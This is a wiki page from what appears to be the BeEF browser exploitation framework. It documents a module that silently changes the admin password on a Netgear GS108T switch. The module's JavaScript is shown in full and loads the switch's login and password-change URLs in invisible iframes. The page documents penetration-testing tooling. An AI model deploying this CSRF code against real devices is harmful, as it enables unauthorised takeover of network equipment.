-
Notifications
You must be signed in to change notification settings - Fork 2.2k
Module: Netgear GS108T CSRF
Haoxi Tan edited this page Jan 9, 2020
·
2 revisions
-
Objective: change the password on a Netgear GS108T managed switch
-
Authors: Bart Leppens
-
Browsers: All
Uses invisible iframe with GET requests to change config.
Note: requires the old password.
var gs_iframe = beef.dom.createInvisibleIframe();
gs_login = function() {
var d = new Date;
var rtime = (d.getTime() / 500);
gs_iframe.setAttribute('src', base+'login.cgi?passwd='+oldpassword+'&rtime='+rtime);
}
var gs108t_iframe = beef.dom.createInvisibleIframe();
gs_change_pwd = function() {
gs108t_iframe.setAttribute('src', base+'password.cgi?inputBox_oldPassword='+oldpassword+'&inputBox_newPassword='+newpassword+'&inputBox_retypeNewPassword='+newpassword);
}
- Configuration
- Interface
- Information Gathering
- Social Engineering
- Network Discovery
- Metasploit
- Tunneling
- XSS Rays
- Persistence
- Creating a Module
- Geolocation
- Using-BeEF-With-NGROK